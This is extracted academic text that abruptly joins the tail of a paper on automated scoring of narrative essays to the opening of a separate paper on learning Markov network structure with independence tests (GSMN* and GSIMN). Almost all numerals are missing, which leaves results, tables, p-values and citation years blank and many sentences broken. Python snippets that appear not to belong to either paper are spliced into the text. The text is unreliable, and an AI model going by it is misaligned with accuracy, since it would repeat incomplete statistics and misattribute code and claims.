all available features produces a significant improvement in performance ( . qwk; p < . ). baseline features are now a part of the best feature set combination (baseline+ details+ modal+ pronoun+ content+ graph+ statives+ subjectivity+ transition), which achieves a qwk of . , an improvement of percentage points (p < . ). the best feature combination without the baseline features achieves qwk = . , and this is not statistically different from the performance of the best system. modal, content, and graph occur in all , and subjectivity and transition occur in nine of the top feature combinations. total for total scoring, the baseline feature set is the best performing individual feature set, with qwk = . . using all features produces a significant (p < . ) performance boost at . qwk. the best feature combination (details+ baseline+ modal+ content+ graph+ subjectivity+ transition) improves over baseline by percentage points, with a qwk of . (p < . ). the best result obtained by a feature combination without baseline (details+ modal+ content+ graph+ subjectivity+ transition) is qwk = . , which is significantly higher than the baseline performance (p < . ),
indicating that our features are able to effectively score essays by themselves, as well as in combination with the baseline features to get an improved system. except for details and transition, all features of the best system also occur in all the top- systems. analysis and discussion the results show that our proposed features vary in effectiveness. graph features proved to be more effective than transition, subjectivity and details. the effectiveness of single-measure features (pronoun, statives, content and modal) was evident by their inclusion in the best combination models. although events was reasonably predictive on its own for organization and development, it was not found in the best performing combinations, nor did it participate in the top feature sets for any of the traits. this surprising result suggests that other features, which are correlated with events, must be stronger indicators of narrative competence. our results also show no clear segregation of features by trait, as most of the features appearing in the best models for organization and development were the same. we attribute this to the high correlation between the human scores for the two traits; a model that is good for one will be good for the other. . correlation study we performed correlation analysis to test if our intuitions regarding the feature sets, as discussed in section , are supported by the data, and to study the effect of length. length is a well-known confounding factor in essay scoring as longer essays tend to get higher scores (chodorow and burstein, ). this also applies to narratives, as it is difficult to tell a good story without using a sufficient amount of words. in our data, pearson correlations of essay length with human scores are: conv.: . , dev.: . , org.: . . however, it is important that our encoded features capture more than just the length of the narrative. in order to test this, we conducted correlation analysis between each feature and human trait score by partialling out length. table shows the maximal partial correlation of each feature set with the human scores.
table : maximal partial correlations with scores, controlling for length (simple correlations in parentheses); rows: baseline, details, transition, events, subjectivity, graph, content, pronoun, modal, statives; columns: org., dev., conv.
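the length-partialled correlations reported above can be computed by residualizing both the feature and the score on essay length and then correlating the residuals; the sketch below does this with numpy and scipy on invented illustration data, and is only meant to make the "partialling out length" step concrete.

```python
# Sketch of a partial correlation between a feature and a human score,
# controlling for essay length: regress each variable on length, then
# correlate the residuals. The three arrays are invented illustration data.
import numpy as np
from scipy.stats import pearsonr

def residualize(v, length):
    """Residuals of v after an ordinary least-squares fit on length."""
    design = np.column_stack([np.ones_like(length), length])
    coef, *_ = np.linalg.lstsq(design, v, rcond=None)
    return v - design @ coef

rng = np.random.default_rng(1)
length = rng.integers(50, 400, size=100).astype(float)   # essay lengths
feature = 0.02 * length + rng.normal(size=100)           # length-influenced feature
score = 0.01 * length + rng.normal(size=100)             # length-influenced score

simple_r, _ = pearsonr(feature, score)
partial_r, _ = pearsonr(residualize(feature, length), residualize(score, length))
print(f"simple r = {simple_r:.2f}, partial r (length removed) = {partial_r:.2f}")
```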
the neg- ative sign for statives, content and modal supports our intuitions regarding these features – more use of these reduces story quality. . error analysis table shows the human-machine confusion matrix for development trait scores. confusion matrices for other traits also show a similar trend. we observe that most of the errors in score prediction are at adja- cent score points. this is perhaps in part due to our human-human agreement criterion during data an- note that, within a set, different features might have maxi- mum values for different traits human machine total table : human-machine confusion matrix for develop- ment traits scores notation – disagreement of one score point did not trigger adjudication. the system encounters more difficulty predicting the correct scores at the ends of the scale (score points - and score point ). the difficulty with scores and is partially attributable to the small amount of training data for these scores. in a more detailed analysis of the human-machine discrepancies, we first focus on the forty essays that were rated by the annotators (table , row ). the machine and human agreed on only eight of these. all eight are non-narratives, and seven of them are extremely short ( to words). twenty seven of the remaining were well-written, long, non-narrative essays (and thus off-purpose accord- ing to our rubric). for example, one of the essays, which was written for a “describe a travel experi- ence” prompt, presented a discussion about the edu- cational advantages of travel in general. next, we consider the essays (all narratives) that were rated by the annotators (row of table ). of these, the eight that were scored by the ma- chine were rather short (length to words) and poorly written. the human and the machine agreed on essays, whose average length was somewhat longer ( words). for the essays that the ma- chine over-scored by point, the average length was words. all five essays that the machine over- scored by points were long, ranging from to words, but were either expository essays or were very poorly written. this scoring pattern sug- gests that human-machine disagreement is at least partially rooted in essay length. for the essays that were rated by the human an- notators (table , last row), the machine underesti- mated nine essays by points. these essays were relatively short (from to words). for com- parison, in the essays where the machine under- estimated the human score by only one point, the average length was words. for the essays that were scored by both the human and machine, the average length was words. a similar effect of length was seen among the essays scored and by the human annotators. the error analysis at the lowest range of human scores demonstrates that an accurate system must be able to properly handle non-narrative essays. one possible solution is to consider coupling our sys- tem with a binary narrative classifier that would flag non-narrative essays. further research is also clearly needed to reduce the influence of essay length on automated scoring. this was particularly demon- strated for essays where writers managed to produce well written, but very short, stories that were under- scored by the machine. conclusions and future work in this article, we have presented evidence that hu- mans can reliably score development and organiza- tion traits and their sub-traits in narratives, and that some sub-traits can be more reliably scored than oth- ers. 
we have also presented evidence that automated systems with narrative-specific features can reliably score narrative quality traits and can do so signifi- cantly better than a state-of-the-art system designed to assess general writing proficiency. scoring narrative essays is challenging because typically there is no right answer, nor any limit to the creative possibilities in effective story-telling. in this work, we have explored only the proverbial tip of the iceberg in terms of features and methods for scoring narrative essays. while we are encouraged by our results, we believe that further improvement will re- quire more elaborate representations of story content and meaning. accordingly, we plan to explore au- tomated evaluation of narrative sub-traits, including plot, point of view and character development, and of the relationships among them. references caralee j. adams. . essay-grading software seen as time-saving tool. education week, ( ): – . apoorv agarwal, anup kotalwar, and owen rambow. . automatic extraction of social networks from literary text: a case study on alice in wonderland. in proceedings of the th international joint conference on natural language processing, pages – . michael j. almeida. . time in narratives. deixis in narrative: a cognitive science perspective, pages – . teresa m. amabile. . social psychology of creativ- ity: a consensual assessment technique. journal of personality and social psychology, ( ): – . yigal attali and jill burstein. . automated essay scoring with e-rater v. . . journal of technology, learning, and assessment, : . nahla bacha. . writing evaluation: what can an- alytic versus holistic essay scoring tell us? system, ( ): – . niranjan balasubramanian, stephen soderland, mausam, and oren etzioni. . generating coherent event schemas at scale. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , seattle, wa, october. david bamman, ted underwood, and noah a. smith. . a bayesian mixed effects model of literary character. in proceedings of the nd annual meet- ing of the association for computational linguistics, pages – , baltimore, ma, usa, june. beata beigman klebanov, jill burstein, nitin madnani, adam faulkner, and joel tetreault. . build- ing subjectivity lexicon(s) from scratch for essay data. computational linguistics and intelligent text pro- cessing, pages – . beata beigman klebanov, nitin madnani, jill burstein, and swapna somasundaran. . content impor- tance models for scoring writing from sources. in proceedings of the nd annual meeting of the asso- ciation for computational linguistics (short papers), pages – . taylor berg-kirkpatrick, david burkett, and dan klein. . an empirical investigation of statistical sig- nificance in nlp. in proceedings of the joint conference on empirical methods in natural lan- guage processing and computational natural lan- guage learning, pages – . association for computational linguistics. thomas bogel, jannik strotgen, and michael gertz. . computational narratology: extracting tense clusters from narrative texts. in nicoletta calzo- lari (conference chair), khalid choukri, thierry declerck, hrafn loftsson, bente maegaard, joseph mariani, asuncion moreno, jan odijk, and stelios piperidis, editors, proceedings of the ninth interna- tional conference on language resources and eval- uation, reykjavik, iceland, may. european language resources association (elra). hein broekkamp, tanja janssen, and huub van den bergh. . 
journal of artificial intelligence research ( ); submitted / ; published /

efficient markov network structure discovery using independence tests

facundo bromberg (fbromberg@frm.utn.edu.ar), departamento de sistemas de información, universidad tecnológica nacional, mendoza, argentina
dimitris margaritis (dmarg@cs.iastate.edu) and vasant honavar (honavar@cs.iastate.edu), dept. of computer science, iowa state university, ames, ia

abstract

we present two algorithms for learning the structure of a markov network from data: gsmn∗ and gsimn. both algorithms use statistical independence tests to infer the structure by successively constraining the set of structures consistent with the results of these tests. until very recently, algorithms for structure learning were based on maximum likelihood estimation, which has been proved to be np-hard for markov networks due to the difficulty of estimating the parameters of the network, needed for the computation of the data likelihood. the independence-based approach does not require the computation of the likelihood, and thus both gsmn∗ and gsimn can compute the structure efficiently (as shown in our experiments). gsmn∗ is an adaptation of the grow-shrink algorithm of margaritis and thrun for learning the structure of bayesian networks. gsimn extends gsmn∗ by additionally exploiting pearl's well-known properties of the conditional independence relation to infer novel independences from known ones, thus avoiding the performance of statistical tests to estimate them. to accomplish this efficiently, gsimn uses the triangle theorem, also introduced in this work, which is a simplified version of the set of markov axioms. experimental comparisons on artificial and real-world data sets show that gsimn can yield significant savings with respect to gsmn∗, while generating a markov network of comparable or, in some cases, improved quality. we also compare gsimn to a forward-chaining implementation, called gsimn-fch, that produces all possible conditional independences resulting from repeatedly applying pearl's theorems on the known conditional independence tests. the results of this comparison show that gsimn, by the sole use of the triangle theorem, is nearly optimal in terms of the set of independence tests that it infers.

. introduction

graphical models (bayesian and markov networks) are an important subclass of statistical models that possess advantages that include clear semantics and a sound and widely accepted theoretical foundation (probability theory). graphical models can be used to represent efficiently the joint probability distribution of a domain. they have been used in numerous application domains, ranging from discovering gene expression pathways in bioinformatics (friedman, linial, nachman, & pe'er, ) to computer vision (e.g., geman & geman, ; besag, york, & mollie, ; isard, ; anguelov, taskar, chatalbashev, koller, gupta, heitz, & ng, ).

[figure: example markov network. the nodes represent variables in the domain v = { , , , , , , , }.]

one problem that naturally arises is the construction of such models from data (heckerman, geiger, & chickering, ; buntine, ).
a solution to this problem, besides being theoretically interesting in itself, also holds the potential of advancing the state-of-the-art in application domains where such models are used. in this paper we focus on the task of learning markov networks (mns) from data in domains in which all variables are either discrete or continuous and distributed according to a multidimensional gaussian distribution. mns are graphical models that consist of two parts: an undirected graph (the model structure), and a set of parameters. an example markov network is shown in figure . learning such models from data consists of two in- terdependent tasks: learning the structure of the network, and, given the learned structure, learning the parameters. in this work we focus on the problem of learning the structure of the mn of a domain from data. we present two algorithms for mn structure learning from data: gsmn∗ (grow-shrink markov network learning algorithm) and gsimn (grow-shrink inference-based markov network learning algorithm). the gsmn∗ algorithm is an adaptation to markov networks of the gs algorithm by margaritis and thrun ( ), originally developed for learning the structure of bayesian networks. gsmn∗ works by first learning the local neighborhood of each variable in the domain (also called the markov blanket of the variable), and then using this information in subsequent steps to improve efficiency. although interesting and useful in itself, we use gsmn∗ as a point of reference of the performance with regard to time complexity and accuracy achieved by gsimn, which is the main result of this work. the gsimn algorithm extends gsmn∗ by using pearl’s theorems on the properties of the conditional independence relation (pearl, ) to infer additional independences from a set of independences resulting from statistical tests and previous inferences, thus avoiding the execution of these tests on data. this allows savings in execution time and, when data are distributed, communication bandwidth. the rest of the paper is organized as follows: in the next section we present previous research related to the problem. section introduces notation, definitions and presents some intuition behind the two algorithms. section contains the main algorithms, gsmn∗ and gsimn, as well as concepts and practical details related to their operation. we evaluate gsmn∗ and gsimn and present our results in section , followed by a summary of our efficient markov network structure discovery using independence tests work and possible directions of future research in section . appendices a and b contain proofs of correctness of gsmn∗ and gsimn. . related work markov networks have been used in the physics and computer vision communities (geman & geman, , besag et al., , anguelov et al., ) where they have been historically called markov random fields. recently there has been interest in their use for spatial data mining, which has applications in geography, transportation, agriculture, climatology, ecology and others (shekhar, zhang, huang, & vatsavai, ). one broad and popular class of algorithms for learning the structure of graphical models is the score-based approach, exemplified for markov networks by della pietra, della pietra, and lafferty ( ), and mccallum ( ). score-based approaches conduct a search in the space of legal structures in an attempt to discover a model structure of maximum score. 
due to the intractable size of the search space i.e., the space of all legal graphs, which is super-exponential in size, score-based algorithms must usually resort to heuristic search. at each step of the structure search, a probabilistic inference step is necessary to evaluate the score (e.g., maximum likelihood, minimum description length, lam & bacchus, , or pseudo-likelihood, besag, ). for bayesian networks this inference step is tractable and therefore several practical score-based algorithms for structure learning have been developed (lam & bacchus, , heckerman, , acid & de campos, ). for markov networks however, probabilistic inference requires the calculation of a normalizing constant (also known as partition function), a problem known to be np-hard (jerrum & sinclair, , barahona, ). a number of approaches have considered a restricted class of graphical models (e.g. chow & liu, , rebane & pearl, , srebro & karger, ). however, srebro and karger ( ) prove that finding the maximum likelihood network is np-hard for markov networks of tree-width greater than . some work in the area of structure learning of undirected graphical models has con- centrated on the learning of decomposable (also called chordal) mns (srebro & karger, ). an example of learning non-decomposable mns is presented in the work of hof- mann and tresp ( ), which is an approach for learning structure in continuous domains with non-linear relationships among the domain attributes. their algorithm removes edges greedily based on a leave-one-out cross validation log-likelihood score. a non-score based approach is in the work of abbeel, koller, and ng ( ), which introduces a new class of ef- ficient algorithms for structure and parameter learning of factor graphs, a class of graphical models that subsumes markov and bayesian networks. their approach is based on a new parameterization of the gibbs distribution in which the potential functions are forced to be probability distributions, and is supported by a generalization of the hammersley-clifford theorem for factor graphs. it is a promising and theoretically sound approach that may lead in the future to practical and efficient algorithms for undirected structure learning. in this work we present algorithms that belong to the independence-based or constraint- based approach (spirtes, glymour, & scheines, ). independence-based algorithms ex- ploit the fact that a graphical model implies that a set of independences exist in the distribu- tion of the domain, and therefore in the data set provided as input to the algorithm (under assumptions, see next section); they work by conducting a set of conditional independence bromberg, margaritis, & honavar tests on data, successively restricting the number of possible structures consistent with the results of those tests to a singleton (if possible), and inferring that structure as the only possible one. a desirable characteristic of independence-based approaches is the fact that they do not require the use of probabilistic inference during the discovery of the structure. also, such algorithms are amenable to proofs of correctness (under assumptions). 
for bayesian networks, the independence-based approach has been mainly exemplified by the sgs (spirtes et al., ), pc (spirtes et al., ), and algorithms that learn the markov blanket as a step in learning the bayesian network structure such as grow-shrink (gs) algorithm (margaritis & thrun, ), iamb and its variants (tsamardinos, aliferis, & statnikov, a), hiton-pc and hiton-mb (aliferis, tsamardinos, & statnikov, ), mmpc and mmmb (tsamardinos, aliferis, & statnikov, b), and max-min hill climbing (mmhc) (tsamardinos, brown, & aliferis, ), all of which are widely used in the field. algorithms for restricted classes such as trees (chow & liu, ) and polytrees (rebane & pearl, ) also exist. for learning markov networks previous work has mainly focused on learning gaussian graphical models, where the assumption of a continuous multivariate gaussian distribution is made; this results in linear dependences among the variables with gaussian noise (whit- taker, , edwards, ). more recent approaches are included in the works of dobra, hans, jones, nevins, yao, and west ( ), (castelo & roverato, ), peña ( ), and schäfer and strimmer ( ), that focus on applications of gaussian graphical models in bioinformatics. while we do not make the assumption of continuous gaussian variables in this paper, all algorithms we present are applicable to such domains with the use of an appropriate conditional independence test (such as partial correlation). the gsmn∗ and gsimn algorithms presented apply to any case where an arbitrary faithful distribu- tion can be assumed and a probabilistic conditional independence test for that distribution is available. the algorithms were first introduced by bromberg, margaritis, and honavar ( ); the contributions of the present paper include extending these results by conducting an extensive evaluation of their experimental and theoretical properties. more specifically, the contributions include an extensive and systematic experimental evaluation of the pro- posed algorithms on (a) data sets sampled from artificially generated networks of varying complexity and strength of dependences, as well as (b) data sets sampled from networks representing real-world domains, and (c) formal proofs of correctness that guarantee that the proposed algorithms will compute the correct markov network structure of the domain, under the stated assumptions. . notation and preliminaries we denote random variables with capitals (e.g., x, y, z) and sets of variables with bold capitals (e.g., x, y, z). in particular, we denote by v = { , . . . , n − } the set of all n variables in the domain. we name the variables by their indices in v; for instance, we refer to the third variable in v simply by . we denote the data set as d and its size (number of data points) by |d| or n . we use the notation (x⊥⊥y | z) to denote the proposition that x is independent of y conditioned on z, for disjoint sets of variables x, y, and z. (x ⊥⊥y | z) denotes conditional dependence. we use (x⊥⊥y | z) as shorthand for ({x}⊥⊥{y } | z) to improve readability. efficient markov network structure discovery using independence tests a markov network is an undirected graphical model that represents the joint probability distribution over v. each node in the graph represents one of the random variables in the domain, and absences of edges encode conditional independences among them. 
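as a concrete illustration of how an undirected structure encodes conditional independences, the following python sketch stores a markov network as adjacency sets and decides separation by checking whether every path between two sets of nodes is blocked by the conditioning set. this is not the authors' code; the names (MarkovNetwork, separated) are illustrative only. under the faithfulness assumption introduced next, this vertex-separation check is exactly what plays the role of an independence oracle when the true network is known.

from collections import deque

class MarkovNetwork:
    """undirected graph over variables 0..n-1, stored as adjacency sets."""
    def __init__(self, n):
        self.n = n
        self.adj = {v: set() for v in range(n)}

    def add_edge(self, x, y):
        self.adj[x].add(y)
        self.adj[y].add(x)

    def separated(self, xs, ys, zs):
        """return True iff the vertex set zs separates xs from ys, i.e.,
        every undirected path from xs to ys passes through zs."""
        xs, ys, zs = set(xs), set(ys), set(zs)
        frontier = deque(xs)
        visited = set(xs)
        while frontier:
            v = frontier.popleft()
            if v in ys:
                return False          # found a path that avoids zs
            for w in self.adj[v]:
                if w not in visited and w not in zs:
                    visited.add(w)
                    frontier.append(w)
        return True

in a faithful domain, separated({x}, {y}, z) returning true corresponds to the conditional independence (x ⊥⊥ y | z) discussed in the next paragraph.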
we assume the underlying probability distribution to be graph-isomorph (pearl, ) or faithful (spirtes et al., ), which means that it has a faithful undirected graph. a graph g is said to be faithful to some distribution if its graph connectivity represents exactly those dependencies and independences existent in the distribution. in detail, this means that for all disjoint sets x, y, z ⊆ v, x is independent of y given z if and only if the set of vertices z separates the set of vertices x from the set of vertices y in the graph g (this is sometimes called the global markov property, lauritzen, ). in other words, after removing all vertices in z from g (including all edges incident to each of them), there exists no (undirected) path in the remaining graph between any variable in x and any variable in y. for example, in figure , the set of variables { , } separates set { , } from set { }. more generally, it has been shown (pearl, ; theorem , page , and definition of graph isomorphism, page ) that a necessary and sufficient condition for a distribution to be graph-isomorph is for its set of independence relations to satisfy the following axioms, for all disjoint sets of variables x, y, z, w and every individual variable γ:

(symmetry)       (x ⊥⊥ y | z) ⇐⇒ (y ⊥⊥ x | z)
(decomposition)  (x ⊥⊥ y ∪ w | z) ⇐⇒ (x ⊥⊥ y | z) ∧ (x ⊥⊥ w | z)
(intersection)   (x ⊥⊥ y | z ∪ w) ∧ (x ⊥⊥ w | z ∪ y) =⇒ (x ⊥⊥ y ∪ w | z)        ( )
(strong union)   (x ⊥⊥ y | z) =⇒ (x ⊥⊥ y | z ∪ w)
(transitivity)   (x ⊥⊥ y | z) =⇒ (x ⊥⊥ γ | z) ∨ (γ ⊥⊥ y | z)

for the operation of the algorithms we also assume the existence of an oracle that can answer statistical independence queries. these are standard assumptions that are needed for formally proving the correctness of independence-based structure learning algorithms (spirtes et al., ).

. independence-based approach to structure learning

gsmn∗ and gsimn are independence-based algorithms for learning the structure of the markov network of a domain. this approach works by evaluating a number of statistical independence statements, reducing the set of structures consistent with the results of these tests to a singleton (if possible), and inferring that structure as the only possible one. as mentioned above, in theory we assume the existence of an independence-query oracle that can provide information about conditional independences among the domain variables. this can be viewed as an instance of a statistical query oracle (kearns & vazirani, ). in practice such an oracle does not exist; however, it can be implemented approximately by a statistical test evaluated on the data set d, for example pearson's conditional independence chi-square (χ2) test (agresti, ) or a mutual information test for discrete data, and partial correlation (spirtes et al., ) for continuous gaussian data. to determine conditional independence between two variables x and y given a set z from data, the statistical test returns a p-value. the p-value of a test equals the probability of obtaining a value for the test statistic that is at least as extreme as the one actually observed, given that the null hypothesis is true, which in our case corresponds to conditional independence. assuming that the p-value of a test is p(x, y | z), the statistical test concludes dependence if and only if p(x, y | z) is less than or equal to a threshold α, i.e., ¬(x ⊥⊥ y | z) ⇐⇒ p(x, y | z) ≤ α.
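to make the decision rule above concrete, the python sketch below implements one common form of the conditional chi-square test for discrete data: the data are stratified by the configuration of the conditioning set z, a chi-square statistic and its degrees of freedom are accumulated over the strata, and dependence is declared whenever the resulting p-value falls at or below α. this is only a minimal sketch of the kind of test the text describes, not the paper's own implementation; its handling of sparse tables is simplified, α = 0.05 is assumed for illustration, and all function names are hypothetical.

import numpy as np
from scipy.stats import chi2

def ci_p_value(data, x, y, z):
    """p-value of a conditional chi-square test of independence of columns
    x and y given the columns in z, for a discrete data set given as a
    2-d integer array (rows = data points, columns = variables)."""
    # group rows by the configuration of the conditioning variables z
    keys = [tuple(row) for row in data[:, list(z)]] if z else [()] * len(data)
    strata = {}
    for key, xv, yv in zip(keys, data[:, x], data[:, y]):
        strata.setdefault(key, []).append((xv, yv))
    stat, dof = 0.0, 0
    for pairs in strata.values():
        xs, ys = zip(*pairs)
        xvals, yvals = sorted(set(xs)), sorted(set(ys))
        if len(xvals) < 2 or len(yvals) < 2:
            continue                       # degenerate stratum carries no information
        # observed counts, and expected counts under independence within the stratum
        obs = np.zeros((len(xvals), len(yvals)))
        for a, b in pairs:
            obs[xvals.index(a), yvals.index(b)] += 1
        expected = np.outer(obs.sum(1), obs.sum(0)) / obs.sum()
        stat += ((obs - expected) ** 2 / np.where(expected > 0, expected, 1)).sum()
        dof += (len(xvals) - 1) * (len(yvals) - 1)
    return 1.0 if dof == 0 else chi2.sf(stat, dof)

def dependent(data, x, y, z, alpha=0.05):
    """decision rule from the text: dependence iff p(x, y | z) <= alpha."""
    return ci_p_value(data, x, y, z) <= alpha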
the quantity − α is sometimes referred to as the test’s confidence threshold. we use the standard value of α = . in all our experiments, which corresponds to a confidence threshold of %. in a faithful domain, it can be shown (pearl & paz, ) that an edge exists between two variables x = y ∈ v in the markov network of that domain if an only if they are dependent conditioned on all remaining variables in the domain, i.e., (x, y ) is an edge iff (x ⊥⊥y | v −{x, y }). thus, to learn the structure, theoretically it suffices to perform only n(n − )/ tests i.e., one test (x, y | v −{x, y }) for each pair of variables x, y ∈ v, x = y . unfortunately, in non-trivial domains this usually involves a test that conditions on a large number of variables. large conditioning sets produce sparse contingency tables (count histograms) which result in unreliable tests. this is because the number of possible configurations of the variables grows exponentially with the size of the conditioning set—for example, there are n cells in a test involving n binary variables, and to fill such a table with one data point per cell we would need a data set of at least exponential size i.e., n ≥ n. exacerbating this problem, more than one data point per cell is typically necessary for a reliable test: as recommended by cochran ( ), if more than % of the cells of the contingency table have less than data points the test is deemed unreliable. therefore both gsmn∗ and gsimn algorithms (presented below) attempt to minimize the conditioning set size; they do that by choosing an order of examining the variables such that irrelevant variables are examined last. . algorithms and related concepts in this section we present our main algorithms, gsmn∗ and gsimn, and supporting con- cepts required for their description. for the purpose of aiding the understanding of the reader, before discussing these we first describe the abstract gsmn algorithm in the next section. this helps in showing the intuition behind the algorithms and laying the foundation for them. . the abstract gsmn algorithm for the sake of clarity of exposition, before discussing our first algorithm gsmn∗, we describe the intuition behind it by describing its general structure using the abstract gsmn algorithm which deliberately leaves a number of details unspecified; these are filled-in in the concrete gsmn∗ algorithm, presented in the next section. note that the choices for these efficient markov network structure discovery using independence tests algorithm gsmn algorithm outline: g = gsmn (v, d). : initialize g to the empty graph. : for all variables x in the domain v do : /* learn the markov blanket bx of x using the gs algorithm. */ : bx ← gs (x, v, d) : add an undirected edge in g between x and each variable y ∈ bx . : return g algorithm gs algorithm. returns the markov blanket bx of variable x ∈ v: bx = gs (x, v, d). : bx ← ∅ : /* grow phase. */ : for each variable y in v −{x} do : if (x ⊥⊥y | bx ) (estimated using data d) then : bx ← bx ∪{y } : goto /* restart grow loop. */ : /* shrink phase. */ : for each variable y in bx do : if (x⊥⊥y | bx −{y }) (estimated using data d) then : bx ← bx −{y } : goto /* restart shrink loop. */ : return bx details are a source of optimizations that can reduce the algorithm’s computational cost. we make these explicit when we discuss the concrete gsmn∗ and gsimn algorithms. the abstract gsmn algorithm is shown in algorithm . 
given as input a data set d and a set of variables v, gsmn computes the set of nodes (variables) bx that are adjacent to each variable x ∈ v; these completely determine the structure of the domain mn. the algorithm consists of a main loop in which it learns the markov blanket bx of each node (variable) x in the domain using the gs algorithm. it then constructs the markov network structure by connecting x with each variable in bx . the gs algorithm was first proposed by margaritis and thrun ( ) and is shown in algorithm . it consists of two phases, a grow phase and a shrink phase. the grow phase of x proceeds by attempting to add each variable y to the current set of hypothesized neighbors of x, contained in bx , which is initially empty. bx grows by some variable y during each iteration of the grow loop of x if and only if y is found dependent with x given the current set of hypothesized neighbors bx . due to the (unspecified) ordering that the variables are examined (this is explicitly specified in the concrete gsmn∗ algorithm, presented in the next section), at the end of the grow phase some of the variables in bx might not be true neighbors of x in the underlying mn—these are called false positives. this justifies the shrink phase of the algorithm, which removes each false positive y in bx by testing for independence with x conditioned on bx −{y }. if y is found independent of x during the shrink phase, it cannot be a true neighbor (i.e., there cannot be an edge x−y ), and gsmn removes it from bx . assuming faithfulness and correctness of the independence query results, by the end of the shrink phase bx contains exactly the neighbors of x in the underlying markov network. bromberg, margaritis, & honavar in the next section we present a concrete implementation of gsmn, called gsmn∗. this augments gsmn by specifying a concrete ordering that the variables x are examined in the main loop of gsmn (lines – in algorithm ), as well as a concrete order that the variables y are examined in the grow and shrink phases of the gs algorithm (lines – and – in algorithm , respectively). . the concrete gsmn∗ algorithm in this section we discuss our first algorithm, gsmn∗ (grow-shrink markov network learning algorithm), for learning the structure of the markov network of a domain. note that the reason for introducing gsmn∗ in addition to our main contribution, the gsimn algorithm (presented later in section . ), is for comparison reasons. in particular, gsimn and gsmn∗ have identical structure, following the same order of examination of variables, with their only difference being the use of inference by gsimn (see details in subsequent sections). introducing gsmn∗ therefore makes it possible to measure precisely (through our experimental results in section ) the benefits of the use of inference on performance. the gsmn∗ algorithm is shown in algorithm . its structure is similar to the abstract gsmn algorithm. one notable difference is that the order that variables are examined is now specified; this is done in the initialization phase where the so-called examination order π and grow order λx of each variable x ∈ v is determined. π and all λx are priority queues and each is initially a permutation of v (λx is a permutation of v −{x}) such that the position of a variable in the queue denotes its priority e.g., π = [ , , ] means that variable has the highest priority (will be examined first), followed by and finally by . 
similarly, the position of a variable in λx determines the order it will be examined during the grow phase of x. during the initialization phase the algorithm computes the strength of unconditional dependence between each pair of variable x and y , as given by the unconditional p-value p(x, y | ∅) of an independence test between each pair of variables x = y , denoted by pxy in the algorithm. (in practice the logarithm of the p-values is computed, which allows greater precision in domains where some dependencies may be very strong or very weak.) in particular, the algorithm gives higher priority to (examines earlier) those variables with a lower average log p-value (line ), indicating stronger dependence. this average is defined as: avg y log(pxy ) = |v|− ∑ y =x log(pxy ). for the grow order λx of variable x, the algorithm gives higher priority to those variables y whose p-value (or equivalently the log of the p-value) with variable x is small (line ). this ordering is due to the intuition behind the “folk-theorem” (as koller & sahami, , puts it) that states that probabilistic influence or association between attributes tends to attenuate over distance in a graphical model. this suggests that a pair of variables x and y with high unconditional p-value are less likely to be directly linked. note that this ordering is a heuristic and is not guaranteed to hold in general. for example, it may not hold if the underlying domain is a bayesian network e.g., two “spouses” may be independent unconditionally but dependent conditional on a common child. note however that this example does not apply to faithful domains i.e., graph-isomorph to a markov network. also efficient markov network structure discovery using independence tests algorithm gsmn∗, a concrete implementation of gsmn: g = gsmn ∗(v, d). : initialize g to the empty graph. : /* initialization. */ : for all x, y ∈ v, x = y do : pxy ← p(x, y | ∅) : initialize π such that ∀i, i′ ∈{ , . . . , n − }, [ i < i′ ⇐⇒ avg j log(pπij ) < avg j log(pπi′ j ) ] . : for all x ∈ v do : bx ← ∅ : initialize λx such that ∀j, j′ ∈{ , . . . , n − }, [ j < j′ ⇐⇒ pxλx j < pxλx j′ ] . : remove x from λx . : /* main loop. */ : while π is not empty do : x ← dequeue(π) : /* propagation phase. */ : t ←{y : y was examined and x ∈ by } : f ←{y : y was examined and x /∈ by } : for all y ∈ t, move y to the end of λx . : for all y ∈ f, move y to the end of λx . : /* grow phase. */ : s ← ∅ : while λx not empty do : y ← dequeue(λx ) : if pxy ≤ α then : if ¬igsmn∗ (x, y, s, f, t) then : s ← s ∪{y } : /* change grow order of y . */ : move x to the beginning of λy . : for w = s|s|− to s do : move w to the beginning of λy . : /* change examination order. */ : for w = s|s|− to s do : if w ∈ π then : move w to the beginning of π. : break to line : /* shrink phase. */ : for y = s|s|− to s do : if igsmn∗ (x, y, s −{y } , f, t) then : s ← s −{y } : bx ← s : add an undirected edge in g between x and each variable y ∈ bx . : return g note that the correctness of all algorithms we present does not depend on it holding i.e., as we prove in appendices a and b, both gsmn∗ and gsimn are guaranteed to return the correct structure under the assumptions stated in section above. also note that the computational cost for the calculation of pxy is low due to the empty conditioning set. 
the remaining of the gsmn∗ algorithm contains the main loop (lines – ) in which each variable in v is examined according to the examination order π, determined during bromberg, margaritis, & honavar algorithm igsmn∗ (x, y, s, f, t): calculate independence test (x, y | s) by propaga- tion, if possible, otherwise run a statistical test on data. : /* attempt to infer dependence by propagation. */ : if y ∈ t then : return false : /* attempt to infer independence by propagation. */ : if y ∈ f then : return true : /* else do statistical test on data. */ : t ← (p(x,y |z)>α) /* t = true iff p-value of statistical test (x, y | s) > α. */ : return t the initialization phase. the main loop includes three phases: the propagation phase (lines – ), the grow phase (lines – ), and the shrink phase (lines – ). the propagation phase is an optimization in which all variables y for which by has already been computed (i.e., all variables y already examined) are collected in two sets f and t. set f (t) contains all variables y such that x /∈ by (x ∈ by ). both sets are passed to the independence procedure igsmn∗ , shown in algorithm , for the purpose of avoiding the execution of any tests between x and y by the algorithm. this is justified by the fact that, in undirected graphs, y is in the markov blanket of x if and only if x is in the markov blanket of y . variables y already found not to contain x in their blanket by (set f) cannot be members of bx because there exists some set of variables that has rendered them conditionally independent of x in a previous step, and independence can therefore be inferred easily. note that in the experiments section of the paper (section ) we evaluate gsmn∗ with and without the propagation phase, in order to measure the effect that this propagation optimization has on performance. turning off propagation is accomplished simply by setting sets t and f (as computed in lines and , respectively) to the empty set. another difference of gsmn∗ from the abstract gsmn algorithm is in the use of condi- tion pxy ≤ α (line ). this is an additional optimization that avoids an independence test in the case that x and y were found (unconditionally) independent during the initialization phase, since in that case this would imply x and y are independent given any conditioning set by the axiom of strong union. a crucial difference between gsmn∗ and the abstract gsmn algorithm is that gsmn∗ changes the examination order π and the grow order λy of every variable y ∈ λx . (since x /∈ λx , this excludes the grow order of x itself.) these changes in ordering proceed as follows: after the end of the grow phase of variable x, the new examination order π (set in lines – ) dictates that the next variable w to be examined after x is the last to be added to s during the growing phase that has not yet been examined (i.e., w is still in π). the grow order λy of all variables y found dependent with x is also changed; this is done to maximize the number of optimizations by the gsimn algorithm (our main contribution in this paper) which shares the algorithm structure of gsmn∗. the changes in grow order are therefore explained in detail in section . when 